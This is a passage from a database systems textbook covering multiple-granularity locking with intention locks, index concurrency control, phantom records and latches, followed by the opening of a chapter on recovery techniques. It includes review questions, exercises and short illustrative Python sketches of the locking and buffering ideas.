larger number of active locks to be handled by the lock manager. More lock and
unlock operations will be performed, causing a higher overhead. In addition, more
storage space will be required for the lock table. For timestamps, storage is required
for the read_TS and write_TS for each data item, and there will be similar overhead
for handling a large number of items.

Given the above tradeoffs, an obvious question can be asked: What is the best item
size? The answer is that it depends on the types of transactions involved. If a typical
transaction accesses a small number of records, it is advantageous to have the data
item granularity be one record. On the other hand, if a transaction typically accesses
many records in the same file, it may be better to have block or file granularity so
that the transaction will consider all those records as one (or a few) data items.

5.2 Multiple Granularity Level Locking
Since the best granularity size depends on the given transaction, it seems appropri-
ate that a database system should support multiple levels of granularity, where the
granularity level can be different for various mixes of transactions. Figure 7 shows a
simple granularity hierarchy with a database containing two files, each file contain-
ing several disk pages, and each page containing several records. This can be used to
illustrate a multiple granularity level 2PL protocol, where a lock can be requested
at any level. However, additional types of locks will be needed to support such a pro-
tocol efficiently.


Consider the following scenario, with only shared and exclusive lock types, that refers
to the example in Figure 7. Suppose transaction T1 wants to update all the records in
file f1, and T1 requests and is granted an exclusive lock for f1. Then all of f1’s pages (p11
through p1n)—and the records contained on those pages—are locked in exclusive
mode. This is beneficial for T1 because setting a single file-level lock is more efficient
than setting n page-level locks or having to lock each individual record. Now suppose
another transaction T2 only wants to read record r1nj from page p1n of file f1; then T2
would request a shared record-level lock on r1nj. However, the database system (that
is, the transaction manager or more specifically the lock manager) must verify the
compatibility of the requested lock with already held locks. One way to verify this is
to traverse the tree from the leaf r1nj to p1n to f1 to db. If at any time a conflicting lock
is held on any of those items, then the lock request for r1nj is denied and T2 is blocked
and must wait. This traversal would be fairly efficient.

However, what if transaction T2’s request came before transaction T1’s request? In
this case, the shared record lock is granted to T2 for r1nj, but when T1’s file-level lock
is requested, it is quite difficult for the lock manager to check all nodes (pages and
records) that are descendants of node f1 for a lock conflict. This would be very inef-
ficient and would defeat the purpose of having multiple granularity level locks.

To make multiple granularity level locking practical, additional types of locks, called
intention locks, are needed. The idea behind intention locks is for a transaction to
indicate, along the path from the root to the desired node, what type of lock (shared
or exclusive) it will require from one of the node’s descendants. There are three
types of intention locks:

1. Intention-shared (IS) indicates that one or more shared locks will be
requested on some descendant node(s).

2. Intention-exclusive (IX) indicates that one or more exclusive locks will be
requested on some descendant node(s).

3. Shared-intention-exclusive (SIX) indicates that the current node is locked in
shared mode but that one or more exclusive locks will be requested on some
descendant node(s).

The compatibility table of the three intention locks, and the shared and exclusive
locks, is shown in Figure 8. Besides the introduction of the three types of intention
locks, an appropriate locking protocol must be used. The multiple granularity
locking (MGL) protocol consists of the following rules:

1. The lock compatibility (based on Figure 8) must be adhered to.

2. The root of the tree must be locked first, in any mode.

3. A node N can be locked by a transaction T in S or IS mode only if the parent
of node N is already locked by transaction T in either IS or IX mode.

4. A node N can be locked by a transaction T in X, IX, or SIX mode only if the
parent of node N is already locked by transaction T in either IX or SIX mode.

5. A transaction T can lock a node only if it has not unlocked any node (to
enforce the 2PL protocol).


            IS     IX     S      SIX    X
    IS      Yes    Yes    Yes    Yes    No
    IX      Yes    Yes    No     No     No
    S       Yes    No     Yes    No     No
    SIX     Yes    No     No     No     No
    X       No     No     No     No     No

Figure 8
Lock compatibility matrix for multiple granularity locking.

6. A transaction T can unlock a node, N, only if none of the children of node N
are currently locked by T.

Rule 1 simply states that conflicting locks cannot be granted. Rules 2, 3, and 4 state
the conditions when a transaction may lock a given node in any of the lock modes.
Rules 5 and 6 of the MGL protocol enforce 2PL rules to produce serializable sched-
ules. To illustrate the MGL protocol with the database hierarchy in Figure 7, con-
sider the following three transactions:

1. T1 wants to update record r111 and record r211.

2. T2 wants to update all records on page p12.

3. T3 wants to read record r11j and the entire f2 file.

Figure 9 shows a possible serializable schedule for these three transactions. Only the
lock and unlock operations are shown. The notation <lock_type>(<item>) is used to
display the locking operations in the schedule.

The multiple granularity level protocol is especially suited when processing a mix of
transactions that include (1) short transactions that access only a few items (records
or fields) and (2) long transactions that access entire files. In this environment, less
transaction blocking and less locking overhead is incurred by such a protocol when
compared to a single level granularity locking approach.
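To make the MGL rules concrete, the following is a minimal, single-threaded Python sketch (not from the text): a lock request walks the granularity hierarchy of Figure 7 from the root down, taking the appropriate intention locks on ancestors before taking the actual S or X lock, and checks every request against the compatibility matrix of Figure 8. The node names, the per-node lock lists, and the handling of a denied request are simplifications for illustration only.

# Minimal single-threaded sketch of multiple granularity locking (MGL).
# Nodes, lock lists, and transaction ids are illustrative, not a real DBMS API.

COMPAT = {  # Figure 8: compatibility matrix for IS, IX, S, SIX, X
    'IS':  {'IS': True,  'IX': True,  'S': True,  'SIX': True,  'X': False},
    'IX':  {'IS': True,  'IX': True,  'S': False, 'SIX': False, 'X': False},
    'S':   {'IS': True,  'IX': False, 'S': True,  'SIX': False, 'X': False},
    'SIX': {'IS': True,  'IX': False, 'S': False, 'SIX': False, 'X': False},
    'X':   {'IS': False, 'IX': False, 'S': False, 'SIX': False, 'X': False},
}

class Node:
    def __init__(self, name, parent=None):
        self.name, self.parent = name, parent
        self.locks = []          # list of (transaction_id, mode) currently held

    def compatible(self, txn, mode):
        return all(COMPAT[mode][m] for t, m in self.locks if t != txn)

def lock(node, txn, mode):
    """Lock `node` in `mode` for `txn`, first taking intention locks on all
    ancestors (rules 3 and 4 of the MGL protocol). Returns False on conflict;
    a real lock manager would queue the request instead."""
    path = []
    n = node
    while n is not None:         # collect ancestors, root first
        path.append(n)
        n = n.parent
    path.reverse()
    intention = 'IS' if mode in ('S', 'IS') else 'IX'
    for ancestor in path[:-1]:
        if not ancestor.compatible(txn, intention):
            return False         # conflicting lock held: txn must wait
        ancestor.locks.append((txn, intention))
    if not node.compatible(txn, mode):
        return False
    node.locks.append((txn, mode))
    return True

# Hierarchy of Figure 7: db -> f1 -> p11 -> r111
db = Node('db'); f1 = Node('f1', db); p11 = Node('p11', f1); r111 = Node('r111', p11)
print(lock(r111, 'T1', 'X'))   # True: IX(db), IX(f1), IX(p11), X(r111)
print(lock(f1, 'T2', 'S'))     # False: S(f1) conflicts with T1's IX(f1)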

6 Using Locks for Concurrency
Control in Indexes

Two-phase locking can also be applied to indexes, where the nodes of an index cor-
respond to disk pages. However, holding locks on index pages until the shrinking
phase of 2PL could cause an undue amount of transaction blocking because search-
ing an index always starts at the root. Therefore, if a transaction wants to insert a
record (write operation), the root would be locked in exclusive mode, so all other
conflicting lock requests for the index must wait until the transaction enters its
shrinking phase. This blocks all other transactions from accessing the index, so in
practice other approaches to locking an index must be used.


Figure 9
Lock operations to illustrate a serializable schedule. The original figure interleaves
the following lock and unlock operations of T1, T2, and T3 over time:

T1: IX(db); IX(f1); IX(p11); X(r111); IX(f2); IX(p21); X(r211);
    unlock(r211); unlock(p21); unlock(f2); unlock(r111); unlock(p11); unlock(f1); unlock(db)

T2: IX(db); IX(f1); X(p12); unlock(p12); unlock(f1); unlock(db)

T3: IS(db); IS(f1); IS(p11); S(r11j); S(f2);
    unlock(r11j); unlock(p11); unlock(f1); unlock(f2); unlock(db)

The tree structure of the index can be taken advantage of when developing a con-
currency control scheme. For example, when an index search (read operation) is
being executed, a path in the tree is traversed from the root to a leaf. Once a lower-
level node in the path has been accessed, the higher-level nodes in that path will not
be used again. So once a read lock on a child node is obtained, the lock on the par-
ent can be released. When an insertion is being applied to a leaf node (that is, when
a key and a pointer are inserted), then a specific leaf node must be locked in exclu-
sive mode. However, if that node is not full, the insertion will not cause changes to
higher-level index nodes, which implies that they need not be locked exclusively.
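The search case can be sketched as follows. This is a minimal, illustrative Python fragment, not a specific DBMS interface: the node layout is made up, and a plain mutex stands in for shared/exclusive latches. The point is only the locking discipline (often called lock coupling), in which the lock on a node is released as soon as the appropriate child has been locked.

import threading

# Illustrative B+-tree node with a per-node lock.
class IndexNode:
    def __init__(self, keys, children=None):
        self.keys = keys                  # sorted separator or leaf keys
        self.children = children          # None for a leaf node
        self.lock = threading.Lock()

def search(root, key):
    """Descend from root to leaf using lock coupling: lock the child before
    releasing the parent, so at most two nodes are locked at any moment."""
    node = root
    node.lock.acquire()
    while node.children is not None:
        i = 0                             # choose the child whose range covers key
        while i < len(node.keys) and key >= node.keys[i]:
            i += 1
        child = node.children[i]
        child.lock.acquire()              # couple: lock child ...
        node.lock.release()               # ... then release parent
        node = child
    found = key in node.keys
    node.lock.release()
    return found

leaf1 = IndexNode([5, 8]); leaf2 = IndexNode([10, 14])
root = IndexNode([10], [leaf1, leaf2])
print(search(root, 14))   # True
print(search(root, 7))    # False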

A conservative approach for insertions would be to lock the root node in exclusive
mode and then to access the appropriate child node of the root. If the child node is


not full, then the lock on the root node can be released. This approach can be
applied all the way down the tree to the leaf, which is typically three or four levels
from the root. Although exclusive locks are held, they are soon released. An alterna-
tive, more optimistic approach would be to request and hold shared locks on the
nodes leading to the leaf node, with an exclusive lock on the leaf. If the insertion
causes the leaf to split, insertion will propagate to one or more higher-level nodes.
Then, the locks on the higher-level nodes can be upgraded to exclusive mode.

Another approach to index locking is to use a variant of the B+-tree, called the
B-link tree. In a B-link tree, sibling nodes at each level of the tree are linked together.
This allows shared locks to be used when requesting a page and requires that the
lock be released before accessing the child node. For an insert operation, the shared
lock on a node would be upgraded to exclusive mode. If a split occurs, the parent
node must be relocked in exclusive mode. One complication is for search operations
executed concurrently with the update. Suppose that a concurrent update operation
follows the same path as the search, and inserts a new entry into the leaf node.
Additionally, suppose that the insert causes that leaf node to split. When the insert is
done, the search process resumes, following the pointer to the desired leaf, only to
find that the key it is looking for is not present because the split has moved that key
into a new leaf node, which would be the right sibling of the original leaf node.
However, the search process can still succeed if it follows the pointer (link) in the
original leaf node to its right sibling, where the desired key has been moved.

Handling the deletion case, where two or more nodes from the index tree merge, is
also part of the B-link tree concurrency protocol. In this case, locks on the nodes to
be merged are held as well as a lock on the parent of the two nodes to be merged.
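The recovery step for a concurrent search can be sketched as follows. This is an illustrative, single-threaded Python fragment with the locking elided; the leaf layout and the high_key field are assumptions made for the example. The high key marks the largest key a node's range can currently contain, which is how a B-link search detects that a concurrent split has moved the key and that it must follow the right-sibling link.

# Illustrative B-link leaf: each leaf stores a high key and a link to its
# right sibling; concurrency control is omitted to keep the example short.
class BLinkLeaf:
    def __init__(self, keys, high_key, right=None):
        self.keys = keys          # keys currently in this leaf
        self.high_key = high_key  # upper bound of this leaf's key range
        self.right = right        # pointer (link) to the right sibling

def search_leaf(leaf, key):
    """Search starting at the leaf a (possibly stale) parent pointer led to.
    If the key is beyond this leaf's range, a concurrent split moved it:
    follow the right-sibling links until the covering leaf is reached."""
    while leaf is not None and key > leaf.high_key:
        leaf = leaf.right         # move right past nodes split concurrently
    return leaf is not None and key in leaf.keys

# Before a split, one leaf held [20, 25, 30]; a concurrent insert split it:
new_right = BLinkLeaf([25, 30], high_key=30)
old_leaf  = BLinkLeaf([20, 22], high_key=22, right=new_right)

# A search that was directed to old_leaf for key 30 still succeeds:
print(search_leaf(old_leaf, 30))   # True, found by following the link
print(search_leaf(old_leaf, 21))   # False, 21 is not in the index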

7 Other Concurrency Control Issues
In this section we discuss some other issues relevant to concurrency control. In
Section 7.1, we discuss problems associated with insertion and deletion of records
and the so-called phantom problem, which may occur when records are inserted. In
Section 7.2 we discuss problems that may occur when a transaction outputs some
data to a monitor before it commits, and then the transaction is later aborted.

7.1 Insertion, Deletion, and Phantom Records
When a new data item is inserted in the database, it obviously cannot be accessed
until after the item is created and the insert operation is completed. In a locking
environment, a lock for the item can be created and set to exclusive (write) mode;
the lock can be released at the same time as other write locks would be released,
based on the concurrency control protocol being used. For a timestamp-based pro-
tocol, the read and write timestamps of the new item are set to the timestamp of the
creating transaction.


Next, consider a deletion operation that is applied on an existing data item. For
locking protocols, again an exclusive (write) lock must be obtained before the trans-
action can delete the item. For timestamp ordering, the protocol must ensure that no
later transaction has read or written the item before allowing the item to be deleted.

A situation known as the phantom problem can occur when a new record that is
being inserted by some transaction T satisfies a condition that a set of records
accessed by another transaction T′ must satisfy. For example, suppose that transac-
tion T is inserting a new EMPLOYEE record whose Dno = 5, while transaction T′ is
accessing all EMPLOYEE records whose Dno = 5 (say, to add up all their Salary values
to calculate the personnel budget for department 5). If the equivalent serial order is
T followed by T′, then T′ must read the new EMPLOYEE record and include its Salary
in the sum calculation. For the equivalent serial order T′ followed by T, the new
salary should not be included. Notice that although the transactions logically con-
flict, in the latter case there is really no record (data item) in common between the
two transactions, since T′ may have locked all the records with Dno = 5 before T
inserted the new record. This is because the record that causes the conflict is a
phantom record that has suddenly appeared in the database on being inserted. If
other operations in the two transactions conflict, the conflict due to the phantom
record may not be recognized by the concurrency control protocol.

One solution to the phantom record problem is to use index locking, as discussed
in Section 6. Recall that an index includes entries that have an attribute value, plus a
set of pointers to all records in the file with that value. For example, an index on Dno
of EMPLOYEE would include an entry for each distinct Dno value, plus a set of
pointers to all EMPLOYEE records with that value. If the index entry is locked before
the record itself can be accessed, then the conflict on the phantom record can be
detected, because transaction T′ would request a read lock on the index entry for
Dno = 5, and T would request a write lock on the same entry before they could place
the locks on the actual records. Since the index locks conflict, the phantom conflict
would be detected.
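A minimal sketch of this idea, assuming a lock table keyed by index entries rather than by records (the class name IndexEntryLockTable and the transaction labels are hypothetical): T′ locks the index entry for Dno = 5 in shared mode before scanning, so T's later request for an exclusive lock on the same entry, which it needs before inserting a record with Dno = 5, is detected as a conflict.

# Sketch of index-entry locking to detect phantom conflicts.
# The lock table maps an (index, key value) pair to the locks held on it.
class IndexEntryLockTable:
    def __init__(self):
        self.locks = {}                      # (index, key) -> list of (txn, mode)

    def request(self, index, key, txn, mode):
        """Grant a lock if compatible with locks held by other transactions;
        only S/S is compatible, any combination involving X conflicts."""
        held = self.locks.setdefault((index, key), [])
        for other_txn, other_mode in held:
            if other_txn != txn and (mode == 'X' or other_mode == 'X'):
                return False                 # conflict: requester must wait
        held.append((txn, mode))
        return True

table = IndexEntryLockTable()

# T' scans all EMPLOYEE records with Dno = 5, locking the index entry first.
print(table.request('EMPLOYEE_Dno_index', 5, "T'", 'S'))   # True

# T wants to insert a new EMPLOYEE with Dno = 5, so it needs an X lock on the
# same index entry; the phantom conflict is detected here and T is blocked.
print(table.request('EMPLOYEE_Dno_index', 5, 'T', 'X'))    # False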

A more general technique, called predicate locking, would lock access to all records
that satisfy an arbitrary predicate (condition) in a similar manner; however, predi-
cate locks have proved to be difficult to implement efficiently.

7.2 Interactive Transactions
Another problem occurs when interactive transactions read input and write output
to an interactive device, such as a monitor screen, before they are committed. The
problem is that a user can input a value of a data item to a transaction T that is
based on some value written to the screen by transaction T′, which may not have
committed. This dependency between T and T′ cannot be modeled by the system
concurrency control method, since it is only based on the user interacting with the
two transactions.

An approach to dealing with this problem is to postpone output of transactions to
the screen until they have committed.


7.3 Latches
Locks held for a short duration are typically called latches. Latches do not follow the
usual concurrency control protocol such as two-phase locking. For example, a latch
can be used to guarantee the physical integrity of a page when that page is being
written from the buffer to disk. A latch would be acquired for the page, the page
written to disk, and then the latch released.
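As an illustration, the following sketch (using Python's threading primitives, with a stand-in write_page_to_disk function and a made-up file path) shows a latch guarding the physical write of a single page: the latch is acquired, the page is written, and the latch is released immediately, with no two-phase discipline involved.

import threading

page_latch = threading.Lock()     # a latch: a short-duration physical lock
page_buffer = bytearray(b'page contents being flushed')

def write_page_to_disk(buffer):
    # Hypothetical stand-in for the actual I/O call that writes one page.
    with open('/tmp/page_0001.bin', 'wb') as f:
        f.write(buffer)

def flush_page():
    """Hold the latch only while the page is physically written, so no other
    thread can modify the buffer mid-write; release it immediately after."""
    with page_latch:              # acquire latch
        write_page_to_disk(page_buffer)
                                  # latch released here, not at end of transaction

flush_page()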

8 Summary
In this chapter we discussed DBMS techniques for concurrency control. We started
by discussing lock-based protocols, which are by far the most commonly used in
practice. We described the two-phase locking (2PL) protocol and a number of its
variations: basic 2PL, strict 2PL, conservative 2PL, and rigorous 2PL. The strict and
rigorous variations are more common because of their better recoverability proper-
ties. We introduced the concepts of shared (read) and exclusive (write) locks, and
showed how locking can guarantee serializability when used in conjunction with
the two-phase locking rule. We also presented various techniques for dealing with
the deadlock problem, which can occur with locking. In practice, it is common to
use timeouts and deadlock detection (wait-for graphs).

We presented other concurrency control protocols that are not used often in prac-
tice but are important for the theoretical alternatives they show for solving this
problem. These include the timestamp ordering protocol, which ensures serializ-
ability based on the order of transaction timestamps. Timestamps are unique,
system-generated transaction identifiers. We discussed Thomas’s write rule, which
improves performance but does not guarantee conflict serializability. The strict
timestamp ordering protocol was also presented. We discussed two multiversion
protocols, which assume that older versions of data items can be kept in the data-
base. One technique, called multiversion two-phase locking (which has been used in
practice), assumes that two versions can exist for an item and attempts to increase
concurrency by making write and read locks compatible (at the cost of introducing
an additional certify lock mode). We also presented a multiversion protocol based
on timestamp ordering, and an example of an optimistic protocol, which is also
known as a certification or validation protocol.

Then we turned our attention to the important practical issue of data item granu-
larity. We described a multigranularity locking protocol that allows the change of
granularity (item size) based on the current transaction mix, with the goal of
improving the performance of concurrency control. An important practical issue
was then presented, which is to develop locking protocols for indexes so that indexes
do not become a hindrance to concurrent access. Finally, we introduced the phan-
tom problem and problems with interactive transactions, and briefly described the
concept of latches and how it differs from locks.


Review Questions
1. What is the two-phase locking protocol? How does it guarantee serializability?

2. What are some variations of the two-phase locking protocol? Why is strict or
rigorous two-phase locking often preferred?

3. Discuss the problems of deadlock and starvation, and the different
approaches to dealing with these problems.

4. Compare binary locks to exclusive/shared locks. Why is the latter type of
locks preferable?

5. Describe the wait-die and wound-wait protocols for deadlock prevention.

6. Describe the cautious waiting, no waiting, and timeout protocols for dead-
lock prevention.

7. What is a timestamp? How does the system generate timestamps?

8. Discuss the timestamp ordering protocol for concurrency control. How does
strict timestamp ordering differ from basic timestamp ordering?

9. Discuss two multiversion techniques for concurrency control.

10. What is a certify lock? What are the advantages and disadvantages of using
certify locks?

11. How do optimistic concurrency control techniques differ from other con-
currency control techniques? Why are they also called validation or certifica-
tion techniques? Discuss the typical phases of an optimistic concurrency
control method.

12. How does the granularity of data items affect the performance of concur-
rency control? What factors affect selection of granularity size for data items?

13. What type of lock is needed for insert and delete operations?

14. What is multiple granularity locking? Under what circumstances is it used?

15. What are intention locks?

16. When are latches used?

17. What is a phantom record? Discuss the problem that a phantom record can
cause for concurrency control.

18. How does index locking resolve the phantom problem?

19. What is a predicate lock?


Exercises
20. Prove that the basic two-phase locking protocol guarantees conflict serializ-
ability of schedules. (Hint: Show that if a serializability graph for a schedule
has a cycle, then at least one of the transactions participating in the schedule
does not obey the two-phase locking protocol.)

21. Modify the data structures for multiple-mode locks and the algorithms for
read_lock(X), write_lock(X), and unlock(X) so that upgrading and downgrad-
ing of locks are possible. (Hint: The lock needs to check the transaction id(s)
that hold the lock, if any.)

22. Prove that strict two-phase locking guarantees strict schedules.

23. Prove that the wait-die and wound-wait protocols avoid deadlock and star-
vation.

24. Prove that cautious waiting avoids deadlock.

25. Apply the timestamp ordering algorithm to the schedules in Figure A.1(b)
and (c) at the end of this chapter, and determine whether the algorithm will
allow the execution of the schedules.

26. Repeat Exercise 25, but use the multiversion timestamp ordering method.

27. Why is two-phase locking not used as a concurrency control method for
indexes such as B+-trees?

28. The compatibility matrix in Figure 8 shows that IS and IX locks are compat-
ible. Explain why this is valid.

29. The MGL protocol states that a transaction T can unlock a node N, only if
none of the children of node N are still locked by transaction T. Show that
without this condition, the MGL protocol would be incorrect.

Selected Bibliography
The two-phase locking protocol and the concept of predicate locks were first pro-
posed by Eswaran et al. (1976). Bernstein et al. (1987), Gray and Reuter (1993), and
Papadimitriou (1986) focus on concurrency control and recovery. Kumar (1996)
focuses on performance of concurrency control methods. Locking is discussed in
Gray et al. (1975), Lien and Weinberger (1978), Kedem and Silberschatz (1980), and
Korth (1983). Deadlocks and wait-for graphs were formalized by Holt (1972), and
the wait-die and wound-wait schemes are presented in Rosenkrantz et al. (1978).
Cautious waiting is discussed in Hsu and Zhang (1992). Helal et al. (1993) com-
pares various locking approaches. Timestamp-based concurrency control tech-
niques are discussed in Bernstein and Goodman (1980) and Reed (1983).
Optimistic concurrency control is discussed in Kung and Robinson (1981) and
Bassiouni (1988). Papadimitriou and Kanellakis (1979) and Bernstein and


Goodman (1983) discuss multiversion techniques. Multiversion timestamp order-
ing was proposed in Reed (1979, 1983), and multiversion two-phase locking is dis-
cussed in Lai and Wilkinson (1984). A method for multiple locking granularities
was proposed in Gray et al. (1975), and the effects of locking granularities are ana-
lyzed in Ries and Stonebraker (1977). Bhargava and Reidl (1988) presents an
approach for dynamically choosing among various concurrency control and recov-
ery methods. Concurrency control methods for indexes are presented in Lehman
and Yao (1981) and in Shasha and Goodman (1988). A performance study of vari-
ous B+-tree concurrency control algorithms is presented in Srinivasan and Carey
(1991).

Other work on concurrency control includes semantic-based concurrency control
(Badrinath and Ramamritham, 1992), transaction models for long-running activi-
ties (Dayal et al., 1991), and multilevel transaction management (Hasse and
Weikum, 1991).


Figure A.1
Example of serializability testing. (a) The read and write operations of three
transactions T1, T2, and T3. (b) Schedule E. (c) Schedule F.

(a) Transaction T1: read_item(X); write_item(X); read_item(Y); write_item(Y)
    Transaction T2: read_item(Z); read_item(Y); write_item(Y); read_item(X); write_item(X)
    Transaction T3: read_item(Y); read_item(Z); write_item(Y); write_item(Z)

(b) Schedule E and (c) Schedule F interleave these operations over time; the original
figure shows each schedule as three columns (one per transaction) with time
increasing downward.


Database Recovery
Techniques

In this chapter we discuss some of the techniques that can be used for database recovery from failures.
This chapter presents concepts that are relevant to recovery protocols, and provides
an overview of the various database recovery algorithms. We start in Section 1 with
an outline of a typical recovery procedure and a categorization of recovery algo-
rithms, and then we discuss several recovery concepts, including write-ahead log-
ging, in-place versus shadow updates, and the process of rolling back (undoing) the
effect of an incomplete or failed transaction. In Section 2 we present recovery tech-
niques based on deferred update, also known as the NO-UNDO/REDO technique,
where the data on disk is not updated until after a transaction commits. In Section 3
we discuss recovery techniques based on immediate update, where data can be
updated on disk during transaction execution; these include the UNDO/REDO and
UNDO/NO-REDO algorithms. We discuss the technique known as shadowing or
shadow paging, which can be categorized as a NO-UNDO/NO-REDO algorithm in
Section 4. An example of a practical DBMS recovery scheme, called ARIES, is pre-
sented in Section 5. Recovery in multidatabases is briefly discussed in Section 6.
Finally, techniques for recovery from catastrophic failure are discussed in Section 7.
Section 8 summarizes the chapter.

Our emphasis is on conceptually describing several different approaches to recov-
ery. For descriptions of recovery features in specific systems, the reader should con-
sult the bibliographic notes at the end of the chapter and the online and printed
user manuals for those systems. Recovery techniques are often intertwined with the

From Chapter 23 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and
Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-
Wesley. All rights reserved.


concurrency control mechanisms. Certain recovery techniques are best used with
specific concurrency control methods. We will discuss recovery concepts indepen-
dently of concurrency control mechanisms, but we will discuss the circumstances
under which a particular recovery mechanism is best used with a certain concur-
rency control protocol.

1 Recovery Concepts

1.1 Recovery Outline and Categorization
of Recovery Algorithms

Recovery from transaction failures usually means that the database is restored to the
most recent consistent state just before the time of failure. To do this, the system
must keep information about the changes that were applied to data items by the
various transactions. This information is typically kept in the system log. A typical
strategy for recovery may be summarized informally as follows:

1. If there is extensive damage to a wide portion of the database due to cata-
strophic failure, such as a disk crash, the recovery method restores a past
copy of the database that was backed up to archival storage (typically tape or
other large capacity offline storage media) and reconstructs a more current
state by reapplying or redoing the operations of committed transactions
from the backed up log, up to the time of failure.

2. When the database on disk is not physically damaged, and a noncatastrophic
failure has occurred, the recovery strategy is to identify any changes that may
cause an inconsistency in the database. For example, a transaction that has
updated some database items on disk but has not been committed needs to
have its changes reversed by undoing its write operations. It may also be nec-
essary to redo some operations in order to restore a consistent state of the
database; for example, if a transaction has committed but some of its write
operations have not yet been written to disk. For noncatastrophic failure, the
recovery protocol does not need a complete archival copy of the database.
Rather, the entries kept in the online system log on disk are analyzed to
determine the appropriate actions for recovery.

Conceptually, we can distinguish two main techniques for recovery from noncata-
strophic transaction failures: deferred update and immediate update. The deferred
update techniques do not physically update the database on disk until after a trans-
action reaches its commit point; then the updates are recorded in the database.
Before reaching commit, all transaction updates are recorded in the local transac-
tion workspace or in the main memory buffers that the DBMS maintains (the
DBMS main memory cache). Before commit, the updates are recorded persistently
in the log, and then after commit, the updates are written to the database on disk.
If a transaction fails before reaching its commit point, it will not have changed the


database in any way, so UNDO is not needed. It may be necessary to REDO the
effect of the operations of a committed transaction from the log, because their
effect may not yet have been recorded in the database on disk. Hence, deferred
update is also known as the NO-UNDO/REDO algorithm. We discuss this tech-
nique in Section 2.

In the immediate update techniques, the database may be updated by some opera-
tions of a transaction before the transaction reaches its commit point. However,
these operations must also be recorded in the log on disk by force-writing before they
are applied to the database on disk, making recovery still possible. If a transaction
fails after recording some changes in the database on disk but before reaching its
commit point, the effect of its operations on the database must be undone; that is,
the transaction must be rolled back. In the general case of immediate update, both
undo and redo may be required during recovery. This technique, known as the
UNDO/REDO algorithm, requires both operations during recovery, and is used
most often in practice. A variation of the algorithm where all updates are required
to be recorded in the database on disk before a transaction commits requires undo
only, so it is known as the UNDO/NO-REDO algorithm. We discuss these techniques
in Section 3.

The UNDO and REDO operations are required to be idempotent—that is, executing
an operation multiple times is equivalent to executing it just once. In fact, the whole
recovery process should be idempotent because if the system were to fail during the
recovery process, the next recovery attempt might UNDO and REDO certain
write_item operations that had already been executed during the first recovery
process. The result of recovery from a system crash during recovery should be the
same as the result of recovering when there is no crash during recovery!

1.2 Caching (Buffering) of Disk Blocks
The recovery process is often closely intertwined with operating system functions—
in particular, the buffering of database disk pages in the DBMS main memory
cache. Typically, multiple disk pages that include the data items to be updated are
cached into main memory buffers and then updated in memory before being writ-
ten back to disk. The caching of disk pages is traditionally an operating system func-
tion, but because of its importance to the efficiency of recovery procedures, it is
handled by the DBMS by calling low-level operating system routines.

In general, it is convenient to consider recovery in terms of the database disk pages
(blocks). Typically a collection of in-memory buffers, called the DBMS cache, is
kept under the control of the DBMS for the purpose of holding the database pages being processed. A
directory for the cache is used to keep track of which database items are in the
buffers.1 This can be a table of <Disk page address, Buffer location, ...> entries.
When the DBMS requests action on some item, first it checks the cache directory to
determine whether the disk page containing the item is in the DBMS cache. If it is
not, the item must be located on disk, and the appropriate disk pages are copied into
the cache. It may be necessary to replace (or flush) some of the cache buffers to
make space available for the new item. Some page replacement strategy similar to
those used in operating systems, such as least recently used (LRU) or first-in-first-
out (FIFO), or a new strategy that is DBMS-specific, such as DBMIN or Least-Likely-
to-Use (see bibliographic notes), can be used to select the buffers for replacement.

1This is somewhat similar to the concept of page tables used by the operating system.

The entries in the DBMS cache directory hold additional information relevant to
buffer management. Associated with each buffer in the cache is a dirty bit, which
can be included in the directory entry, to indicate whether or not the buffer has
been modified. When a page is first read from the database disk into a cache buffer,
a new entry is inserted in the cache directory with the new disk page address, and
the dirty bit is set to 0 (zero). As soon as the buffer is modified, the dirty bit for the
corresponding directory entry is set to 1 (one). Additional information, such as the
transaction id(s) of the transaction(s) that modified the buffer can also be kept in
the directory. When the buffer contents are replaced (flushed) from the cache, the
contents must first be written back to the corresponding disk page only if its dirty bit
is 1. Another bit, called the pin-unpin bit, is also needed—a page in the cache is
pinned (bit value 1 (one)) if it cannot be written back to disk as yet. For example,
the recovery protocol may restrict certain buffer pages from being written back to
the disk until the transactions that changed this buffer have committed.
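The following is a minimal sketch of such a cache directory entry and the flush rule it implies; the field names are illustrative, and the actual disk I/O is represented by a placeholder function.

# Sketch of a DBMS cache directory entry with dirty and pin-unpin bits.
class CacheEntry:
    def __init__(self, disk_page_address, buffer_contents):
        self.disk_page_address = disk_page_address
        self.buffer = buffer_contents
        self.dirty = 0            # set to 1 as soon as the buffer is modified
        self.pinned = 0           # set to 1 if the page may not be flushed yet
        self.modified_by = set()  # ids of transactions that changed the buffer

def write_buffer_to_disk(entry):
    # Placeholder for physically writing entry.buffer to entry.disk_page_address.
    print('writing page', entry.disk_page_address, 'to disk')

def modify(entry, txn_id, new_contents):
    entry.buffer = new_contents
    entry.dirty = 1
    entry.modified_by.add(txn_id)

def flush(entry):
    """Replace (flush) a buffer: write it back only if it is dirty, and never
    while it is pinned (for example, by the recovery protocol)."""
    if entry.pinned:
        raise RuntimeError('page is pinned; choose another buffer to replace')
    if entry.dirty:
        write_buffer_to_disk(entry)
        entry.dirty = 0

entry = CacheEntry(disk_page_address=4711, buffer_contents=b'old data')
modify(entry, 'T1', b'new data')
flush(entry)    # dirty and unpinned, so it is written back to disk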

Two main strategies can be employed when flushing a modified buffer back to disk.
The first strategy, known as in-place updating, writes the buffer to the same original
disk location, thus overwriting the old value of any changed data items on disk.2

Hence, a single copy of each database disk block is maintained. The second strategy,
known as shadowing, writes an updated buffer at a different disk location, so mul-
tiple versions of data items can be maintained, but this approach is not typically
used in practice.

In general, the old value of the data item before updating is called the before image
(BFIM), and the new value after updating is called the after image (AFIM). If shad-
owing is used, both the BFIM and the AFIM can be kept on disk; hence, it is not
strictly necessary to maintain a log for recovering. We briefly discuss recovery based
on shadowing in Section 4.

1.3 Write-Ahead Logging, Steal/No-Steal,
and Force/No-Force

When in-place updating is used, it is necessary to use a log for recovery. In this case,
the recovery mechanism must ensure that the BFIM of the data item is recorded in
the appropriate log entry and that the log entry is flushed to disk before the BFIM is
overwritten with the AFIM in the database on disk. This process is generally known
as write-ahead logging, and is necessary to be able to UNDO the operation if this is
required during recovery. Before we can describe a protocol for write-ahead

logging, we need to distinguish between two types of log entry information
included for a write command: the information needed for UNDO and the informa-
tion needed for REDO. A REDO-type log entry includes the new value (AFIM) of
the item written by the operation since this is needed to redo the effect of the oper-
ation from the log (by setting the item value in the database on disk to its AFIM).
The UNDO-type log entries include the old value (BFIM) of the item since this is
needed to undo the effect of the operation from the log (by setting the item value in
